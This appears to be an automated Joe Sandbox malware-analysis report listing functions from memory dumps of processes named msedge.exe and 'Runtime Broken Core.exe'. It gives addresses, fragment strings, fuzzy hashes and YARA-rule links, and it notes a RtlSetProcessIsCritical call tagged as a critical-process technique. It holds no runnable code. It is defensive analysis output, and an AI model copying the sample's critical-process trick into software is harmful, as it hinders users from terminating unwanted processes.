Source File: 00000011.00000002.1535904624.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaac630000_msedge.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^)$L_^L
API String ID: 0-2913285933
Opcode ID: da45935846206c2eb1aa805830638e06303ccf4a1a544400e5d9bd21561c7117
Instruction ID: d6eb5e896618ae2ad8acff2b396c4590d6eb87fddda40b2f275c912ece4a4181
Opcode Fuzzy Hash: da45935846206c2eb1aa805830638e06303ccf4a1a544400e5d9bd21561c7117
Instruction Fuzzy Hash: D911A7B3D0C56747D20573F9BC624FE2754EF4923A708E272D39ED8653AE18604B45C5

Function 00007FFAAC6304FA Relevance: 5.0, Strings: 4, Instructions: 14COMMON

Download Yara Rule

Strings

L_^), xrefs: 00007FFAAC6306C9
L_^, xrefs: 00007FFAAC630772
L_^, xrefs: 00007FFAAC63079A
L_^L, xrefs: 00007FFAAC630762

Memory Dump Source

Source File: 00000011.00000002.1535904624.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaac630000_msedge.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^)$L_^L
API String ID: 0-2913285933
Opcode ID: 409238f69dcc90bb9eeabc606b6c8e93302a275957c2630b4c8cf606c3fd444b
Instruction ID: 6b606679ba1f3e0ff4001d687aedf0313fd20b5139e21b69a58c89ad3ee2684d
Opcode Fuzzy Hash: 409238f69dcc90bb9eeabc606b6c8e93302a275957c2630b4c8cf606c3fd444b
Instruction Fuzzy Hash: 29D01276D0C1630BD70177F8F4265D53B508F4723A708C1B3D1CD9D5A39E05205582CB

Analysis Process: msedge.exePID: 8072, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	15.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAAC622BDD Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFAAC622CB2

Memory Dump Source

Source File: 00000012.00000002.2577284032.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffaac620000_msedge.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 4a2dcbe98e019ab7b84b7b8bbd37b01c6de3ab22ca49561b63df6a39a9668d79
Instruction ID: 77c529237a5a8ffec3a23042ab6124381d59c61ef473338e3c607604359af1e8
Opcode Fuzzy Hash: 4a2dcbe98e019ab7b84b7b8bbd37b01c6de3ab22ca49561b63df6a39a9668d79
Instruction Fuzzy Hash: 5F41F47190C7498FD719DFA8D845AE9BBF0FF56311F04416ED08AC3692CB74A846CB91

Analysis Process: Runtime Broken Core.exePID: 1648, Parent PID: 932COMMON

Executed Functions

Function 00007FFAAC6112F8 Relevance: 4.5, Strings: 3, Instructions: 767COMMON

Download Yara Rule

Strings

(Q, xrefs: 00007FFAAC6119D4
(Q, xrefs: 00007FFAAC611948
1N_^, xrefs: 00007FFAAC611301

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q$1N_^
API String ID: 0-2413934520
Opcode ID: dc21182fd9fd095994da6031c8b5e6bb0c873b30c53b75cc9af17628916bba47
Instruction ID: 4d7dd51d3bc01278d972ed91f6ddfc2f6d8b3a7883744f84b21b2d837c73c02b
Opcode Fuzzy Hash: dc21182fd9fd095994da6031c8b5e6bb0c873b30c53b75cc9af17628916bba47
Instruction Fuzzy Hash: B2913B72D0D6928FE702F7BCA4655E97FA0EF46226B0885B7D1CDCB193DE18644A83C1

Function 00007FFAAC6114D3 Relevance: 4.4, Strings: 3, Instructions: 612COMMON

Download Yara Rule

Strings

/N_^, xrefs: 00007FFAAC611501
(Q, xrefs: 00007FFAAC6119D4
(Q, xrefs: 00007FFAAC611948

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q$/N_^
API String ID: 0-1059559188
Opcode ID: 72d0e50ddb3863ea1c508ef300d1a87e200524632e53c2ec8b0841c00184d102
Instruction ID: 4a83b8d770c9b786c0bd152c1e9db9f7f9e1d2cd74f0b9c3a3c199a181fcd13e
Opcode Fuzzy Hash: 72d0e50ddb3863ea1c508ef300d1a87e200524632e53c2ec8b0841c00184d102
Instruction Fuzzy Hash: 6551C071E0DA8A8FFB42F77888655F87BE1EF59321B0494B6D08CD7193DE24984683C1

Function 00007FFAAC6114A0 Relevance: 3.1, Strings: 2, Instructions: 619COMMON

Download Yara Rule

Strings

(Q, xrefs: 00007FFAAC6119D4
(Q, xrefs: 00007FFAAC611948

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q
API String ID: 0-2438238192
Opcode ID: 2184a23a44ef39bd41db308c66c32a6b0c255c9e22fe22b4b3cd7447f2e84837
Instruction ID: e4df3e2f08a20fb8fee12b906251df4b1f49a9a862c0858e8479a749678b671a
Opcode Fuzzy Hash: 2184a23a44ef39bd41db308c66c32a6b0c255c9e22fe22b4b3cd7447f2e84837
Instruction Fuzzy Hash: 12518E71E0DA958FFB42E77888655F87FE1EF56311B0494B6D08DD7193DE24980A83C0

Function 00007FFAAC610D2F Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC610E6D

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: daf08fe91fe4d65e2e633e099de94bdc7b78c469ee851960b02c8ea7fd4cc476
Instruction ID: 006c108871e8591d71c733b23f11c8efee591f34f08873921a0a349504422e4b
Opcode Fuzzy Hash: daf08fe91fe4d65e2e633e099de94bdc7b78c469ee851960b02c8ea7fd4cc476
Instruction Fuzzy Hash: 884159B2F196968FEB41FBB8D8255E87BA0FF95311B4484BAD04DC72A3DD24A805C7C0

Function 00007FFAAC610D98 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC610E6D

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: a73069f1bee7ceb608280219a0763d824dc9ecf60998241e14c2838807a777d7
Instruction ID: 228aa24672c982341d2aa8ab614b1010d683d8941b4eff9662085d076f8a3191
Opcode Fuzzy Hash: a73069f1bee7ceb608280219a0763d824dc9ecf60998241e14c2838807a777d7
Instruction Fuzzy Hash: 3531E7B1E5968A8FEB45EBB884695E97FE1FF99300B4084B9D04DC7296DD346804C780

Function 00007FFAAC610DA8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC610E6D

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: d186efac006bfe8871f66cc57d3f88ac30c1b177ae228afd3c556ceb815d3315
Instruction ID: 4ede680aaf0f8bcb282b269998d69f3308cebc30c5a276d9b226e63a91542099
Opcode Fuzzy Hash: d186efac006bfe8871f66cc57d3f88ac30c1b177ae228afd3c556ceb815d3315
Instruction Fuzzy Hash: 7D31C7B1E5968A8FEB45EBB8C4695E97BE1FF98300B80C5B9E00DC7296DD345944C780

Function 00007FFAAC612249 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

8e, xrefs: 00007FFAAC61226D

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: 8e
API String ID: 0-1620073548
Opcode ID: 79d7b21189bcf7ed5b4cd574f7452a92366d0b2b040e7f7d8f1ce826da9c5008
Instruction ID: e7610acb1b7893bdd3fdbb845f386dfe885cce1fb1c13197c325ac84b84d8338
Opcode Fuzzy Hash: 79d7b21189bcf7ed5b4cd574f7452a92366d0b2b040e7f7d8f1ce826da9c5008
Instruction Fuzzy Hash: 86F0425190D7400FE755E66868669657FE0DBE5210B0945EBD44CC71A7D91CDC858382

Non-executed Functions

Function 00007FFAAC6105FA Relevance: 6.7, Strings: 5, Instructions: 491COMMON

Download Yara Rule

Strings

N_^L, xrefs: 00007FFAAC610762
N_^), xrefs: 00007FFAAC6106C9
N_^, xrefs: 00007FFAAC61079A
>N_^, xrefs: 00007FFAAC610601
N_^, xrefs: 00007FFAAC610772

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: >N_^$N_^$N_^$N_^)$N_^L
API String ID: 0-3346635865
Opcode ID: e353007781fe88e6392b7b3bfbf9e121b67256b01b9ac8457b8faf0e878c73b1
Instruction ID: 9e38e814a6ce8b6ba4ed45acaef90c315aa5b491360d51bdb26f6f03d79b8a8b
Opcode Fuzzy Hash: e353007781fe88e6392b7b3bfbf9e121b67256b01b9ac8457b8faf0e878c73b1
Instruction Fuzzy Hash: A9E18567D0D2A34BE702B7FCF8715EA6F50DF4623A70881B7D2CDDA1A39D18604A82D5

Function 00007FFAAC6106D3 Relevance: 6.7, Strings: 5, Instructions: 414COMMON

Download Yara Rule

Strings

N_^L, xrefs: 00007FFAAC610762
N_^9, xrefs: 00007FFAAC610712
N_^1, xrefs: 00007FFAAC6106F2
N_^, xrefs: 00007FFAAC61079A
N_^, xrefs: 00007FFAAC610772

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^1$N_^9$N_^L
API String ID: 0-1020113782
Opcode ID: a1e45d06d5c86d72bc66724006ae47e590f838f83f4df0c3aea4f6ad028f9d07
Instruction ID: 8ff984bbbc30b7ff992aedb77ed535f4ddcb118178b4fd8be716db85173b05b2
Opcode Fuzzy Hash: a1e45d06d5c86d72bc66724006ae47e590f838f83f4df0c3aea4f6ad028f9d07
Instruction Fuzzy Hash: BDC18267D0D2A24BE702B7F8F8714E67F50DF4623A70881B7D2CDDA1A3DE18604A82D5

Function 00007FFAAC6106E8 Relevance: 6.7, Strings: 5, Instructions: 405COMMON

Download Yara Rule

Strings

N_^L, xrefs: 00007FFAAC610762
N_^9, xrefs: 00007FFAAC610712
N_^1, xrefs: 00007FFAAC6106F2
N_^, xrefs: 00007FFAAC61079A
N_^, xrefs: 00007FFAAC610772

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^1$N_^9$N_^L
API String ID: 0-1020113782
Opcode ID: 696c445ad280bcbc57cff4a9f9b9ecfd58b0b309ec96615b835ad2dd25cf875a
Instruction ID: bd2fc98f944758ea66b8d21f89198f52b1aab472c1171df6e6d73d1266adc0b6
Opcode Fuzzy Hash: 696c445ad280bcbc57cff4a9f9b9ecfd58b0b309ec96615b835ad2dd25cf875a
Instruction Fuzzy Hash: 18C18467D0D2A34BE702B7F8F8714E67F509F4623A70881B7D2CDDA1A3DE18644A82D5

Function 00007FFAAC610620 Relevance: 5.5, Strings: 4, Instructions: 469COMMON

Download Yara Rule

Strings

N_^L, xrefs: 00007FFAAC610762
N_^), xrefs: 00007FFAAC6106C9
N_^, xrefs: 00007FFAAC61079A
N_^, xrefs: 00007FFAAC610772

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^)$N_^L
API String ID: 0-3454040078
Opcode ID: 1387ae5d263cd25a9c0834e4ef937c81a6ee5470264de1c0e3d957c6bfc8f9ad
Instruction ID: d6fb3e07b8db1e55e14b095d037cb55d5121c65463ec002cc2818e99b543e15a
Opcode Fuzzy Hash: 1387ae5d263cd25a9c0834e4ef937c81a6ee5470264de1c0e3d957c6bfc8f9ad
Instruction Fuzzy Hash: 83D18567D0D2A34BE70277FCF8715EA6F509F4623A708C1B7D2CDDA1A39E18604A82D5

Function 00007FFAAC6106B8 Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

N_^L, xrefs: 00007FFAAC610762
N_^), xrefs: 00007FFAAC6106C9
N_^, xrefs: 00007FFAAC61079A
N_^, xrefs: 00007FFAAC610772

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^)$N_^L
API String ID: 0-3454040078
Opcode ID: 2adc661b14446fe5aecf19700c69cf202eb712e2839be424db166d965288786d
Instruction ID: 0c7fc4692fd31749c3ca17d47206221769cb1c1c8f6c13e6efb3a4661bdf7ab1
Opcode Fuzzy Hash: 2adc661b14446fe5aecf19700c69cf202eb712e2839be424db166d965288786d
Instruction Fuzzy Hash: 311191B3D0C5274BD30673F8BC725FA2784EF4923A7489272D39ED9653ED18604646C6

Function 00007FFAAC6104FA Relevance: 5.0, Strings: 4, Instructions: 14COMMON

Download Yara Rule

Strings

N_^L, xrefs: 00007FFAAC610762
N_^), xrefs: 00007FFAAC6106C9
N_^, xrefs: 00007FFAAC61079A
N_^, xrefs: 00007FFAAC610772

Memory Dump Source

Source File: 00000015.00000002.1618021243.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac610000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^)$N_^L
API String ID: 0-3454040078
Opcode ID: ab8555bc176a92975b5b6d315502e0ad642401397b275f52bc8aa0d69b62daa2
Instruction ID: 0bdfb0cb076490a25ba8a208b3ed7d1077baa70e095b6b0c3ccacf0f52263887
Opcode Fuzzy Hash: ab8555bc176a92975b5b6d315502e0ad642401397b275f52bc8aa0d69b62daa2
Instruction Fuzzy Hash: 80D01276D0C1630BD70177F8F4266D53B508F4623A708C1B3D2CDDD5A39E04205583CA

Analysis Process: Runtime Broken Core.exePID: 7196, Parent PID: 4056COMMON

Executed Functions

Function 00007FFAAC6312F8 Relevance: 4.5, Strings: 3, Instructions: 768COMMON

Download Yara Rule

Strings

1L_^, xrefs: 00007FFAAC631301
(Q, xrefs: 00007FFAAC631948
(Q, xrefs: 00007FFAAC6319D4

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q$1L_^
API String ID: 0-2355454934
Opcode ID: 6cfc45ca5e5b178f78e611ccd258e99f8e01b97aca6c79eef601b03f45e9dea4
Instruction ID: d1f759ee91f9884865cfcc5205288f22a4eb3f04e21185f12f169e2a3c992302
Opcode Fuzzy Hash: 6cfc45ca5e5b178f78e611ccd258e99f8e01b97aca6c79eef601b03f45e9dea4
Instruction Fuzzy Hash: 82A15D62D0D6934FE702F7B894664F93FA0EF46225B0891B7D1CDDB2A3DE18644A83C1

Function 00007FFAAC6314D3 Relevance: 4.4, Strings: 3, Instructions: 616COMMON

Download Yara Rule

Strings

(Q, xrefs: 00007FFAAC631948
/L_^, xrefs: 00007FFAAC631501
(Q, xrefs: 00007FFAAC6319D4

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q$/L_^
API String ID: 0-1017332602
Opcode ID: cbdbe86f6c5e6ddd5ee507b3374dc71440aad51a1b2c356de0442c707e4067e1
Instruction ID: 8bf27e9db89c3a83d5aa9e4b375dabe5561e90c20026bdd9ee9bb6c2ba559ade
Opcode Fuzzy Hash: cbdbe86f6c5e6ddd5ee507b3374dc71440aad51a1b2c356de0442c707e4067e1
Instruction Fuzzy Hash: CA516171E0DA894FE745E77898555F97FE1EF5A210F0490B6D08DD72D3DE28980A83C1

Function 00007FFAAC6314A0 Relevance: 3.1, Strings: 2, Instructions: 623COMMON

Download Yara Rule

Strings

(Q, xrefs: 00007FFAAC631948
(Q, xrefs: 00007FFAAC6319D4

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q
API String ID: 0-2438238192
Opcode ID: 358f65140b5e59a76f40d2015a62a9ae8bb5d8b3140d8574f5ae1bd5190bda49
Instruction ID: 142e213ff2e58157cdd60c845ec97f8818b323d3447575ba88fde80d7556e446
Opcode Fuzzy Hash: 358f65140b5e59a76f40d2015a62a9ae8bb5d8b3140d8574f5ae1bd5190bda49
Instruction Fuzzy Hash: 15515D71E0DA958FEB46E77888555F97FE1EF56210B0450B6D08DC72D3DE28A80A83D1

Function 00007FFAAC630D2F Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC630E6D

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: a4795c95a29df7a5a4b332f6c784c162b5ffbfb1593472886266a2c5e55f6504
Instruction ID: 5753c263744c9e588905626d909f54e3fd18f0d2820b19b25dd567e667277bf1
Opcode Fuzzy Hash: a4795c95a29df7a5a4b332f6c784c162b5ffbfb1593472886266a2c5e55f6504
Instruction Fuzzy Hash: 30414AB2F196968FE742EBB8D8255E97BE0FF45310B44847AD04DC7293DE3868098781

Function 00007FFAAC630D98 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC630E6D

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 1cad9279078f527cb0541c493e75720b95847285d9f876d26250f6e2f4a3b567
Instruction ID: 0b82932470c2d731ea3629889624e83f226021dbf213b0bd2396d7e751512d83
Opcode Fuzzy Hash: 1cad9279078f527cb0541c493e75720b95847285d9f876d26250f6e2f4a3b567
Instruction Fuzzy Hash: 6531C9B1E1868A8FEB46EBB884595E97BE1FF49300F4094B9D04DC73D7DE3868088781

Function 00007FFAAC630DA8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC630E6D

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 9ce877840ad98829325d167cfc4677fee5b02956aff70435538d20c74edbb7cc
Instruction ID: 32b69bd9062dd6de54bce3423705cf46dd9a8c0eaf28b2afc272d1bfe9ff9f71
Opcode Fuzzy Hash: 9ce877840ad98829325d167cfc4677fee5b02956aff70435538d20c74edbb7cc
Instruction Fuzzy Hash: F03187B1E19A4A9FEB85EBB884595E97BE1FF49300F408579E00DC73D7DE3869088781

Function 00007FFAAC632249 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

8e, xrefs: 00007FFAAC63226D

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: 8e
API String ID: 0-1620073548
Opcode ID: b65f7ddab57e5c1b3500cf87dbad57045ea9f59371bd6f078a1f6e916b56cffb
Instruction ID: 71a1b4b528a2a03031dd537dfe9213ebd24d07e12106bba40ce9882ed08bb0ca
Opcode Fuzzy Hash: b65f7ddab57e5c1b3500cf87dbad57045ea9f59371bd6f078a1f6e916b56cffb
Instruction Fuzzy Hash: 1CF04C61A0DB800FE795E668A85A9657FE0DBA6210B0845EBD84CC72E7D91CDC898383

Non-executed Functions

Function 00007FFAAC6305FA Relevance: 6.7, Strings: 5, Instructions: 486COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFAAC630772
>L_^, xrefs: 00007FFAAC630601
L_^), xrefs: 00007FFAAC6306C9
L_^, xrefs: 00007FFAAC63079A
L_^L, xrefs: 00007FFAAC630762

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: >L_^$L_^$L_^$L_^)$L_^L
API String ID: 0-2305563386
Opcode ID: 69e0ea13424e1eb9a80ba22b38cd0dc169c06c5436c173596169be700536a35e
Instruction ID: f5ed05a2db64b293a23cdcd7c37e8923d4de4c72bf58dd17b39f1b1e3adba217
Opcode Fuzzy Hash: 69e0ea13424e1eb9a80ba22b38cd0dc169c06c5436c173596169be700536a35e
Instruction Fuzzy Hash: E4E17467D0D2A34BE20277FDF8624EA3B50DF4623A709D1B7D2CDD91A39E18604A82D5

Function 00007FFAAC6306D3 Relevance: 6.7, Strings: 5, Instructions: 409COMMON

Download Yara Rule

Strings

L_^1, xrefs: 00007FFAAC6306F2
L_^, xrefs: 00007FFAAC630772
L_^, xrefs: 00007FFAAC63079A
L_^L, xrefs: 00007FFAAC630762
L_^9, xrefs: 00007FFAAC630712

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^1$L_^9$L_^L
API String ID: 0-3229500110
Opcode ID: 9c22734398ac7b3239e706b81cfbe751c17613d9dff303f5f45eb6a50aaa5335
Instruction ID: f21239aade53804ba0e5b9e350637367b7e15c56b8045c5848c67f4061133ebc
Opcode Fuzzy Hash: 9c22734398ac7b3239e706b81cfbe751c17613d9dff303f5f45eb6a50aaa5335
Instruction Fuzzy Hash: EFC17267D0D2934BE302B7FCF8664EA3F50DF4622A70891B7D2CDD91A39E18604A86D5

Function 00007FFAAC6306E8 Relevance: 6.6, Strings: 5, Instructions: 400COMMON

Download Yara Rule

Strings

L_^1, xrefs: 00007FFAAC6306F2
L_^, xrefs: 00007FFAAC630772
L_^, xrefs: 00007FFAAC63079A
L_^L, xrefs: 00007FFAAC630762
L_^9, xrefs: 00007FFAAC630712

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^1$L_^9$L_^L
API String ID: 0-3229500110
Opcode ID: ae9db1d3a6daca868f95378e65ba1a3ac56ba377f4f4f187a5bd444c50818e6c
Instruction ID: 67b00187e0f207f8105ddb5413f8b6346938590d32b09d8f1b2e8be352fcfd57
Opcode Fuzzy Hash: ae9db1d3a6daca868f95378e65ba1a3ac56ba377f4f4f187a5bd444c50818e6c
Instruction Fuzzy Hash: 31C18367D0D2934BE302B7F8F8624EA3F50DF4622A708D1B7D2CDD91A3DE18604A86D5

Function 00007FFAAC6305D3 Relevance: 5.5, Strings: 4, Instructions: 495COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFAAC630772
L_^), xrefs: 00007FFAAC6306C9
L_^, xrefs: 00007FFAAC63079A
L_^L, xrefs: 00007FFAAC630762

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^)$L_^L
API String ID: 0-2913285933
Opcode ID: b48db97cb2a532648533a3cbb61d18d8fdb79610088b9c0e1db811529b99ccd7
Instruction ID: e5f1f56d904c940f75a299866fd1998af5ba833148903dabed5bfd4ff13982fa
Opcode Fuzzy Hash: b48db97cb2a532648533a3cbb61d18d8fdb79610088b9c0e1db811529b99ccd7
Instruction Fuzzy Hash: 4EE18567E0D1A35BE20277FDF8624EA3F50DF4623A708D1B7D2CDD91A39E18604A82D5

Function 00007FFAAC630620 Relevance: 5.5, Strings: 4, Instructions: 464COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFAAC630772
L_^), xrefs: 00007FFAAC6306C9
L_^, xrefs: 00007FFAAC63079A
L_^L, xrefs: 00007FFAAC630762

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^)$L_^L
API String ID: 0-2913285933
Opcode ID: afacf573856ece473b52dda3ebf801e7c657f14c514ac310d17026c9e15de19a
Instruction ID: 1c5035f666a678b0420e33ffba3a1a3b91c063752a6a5f8ba7cc8e2b0fb2e0c9
Opcode Fuzzy Hash: afacf573856ece473b52dda3ebf801e7c657f14c514ac310d17026c9e15de19a
Instruction Fuzzy Hash: 4FD17567D0D1A34BE30277FDF8624EA3F509F4623A709D2B7D2CDD91A39E18604A82D5

Function 00007FFAAC6306B8 Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFAAC630772
L_^), xrefs: 00007FFAAC6306C9
L_^, xrefs: 00007FFAAC63079A
L_^L, xrefs: 00007FFAAC630762

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^)$L_^L
API String ID: 0-2913285933
Opcode ID: da45935846206c2eb1aa805830638e06303ccf4a1a544400e5d9bd21561c7117
Instruction ID: d6eb5e896618ae2ad8acff2b396c4590d6eb87fddda40b2f275c912ece4a4181
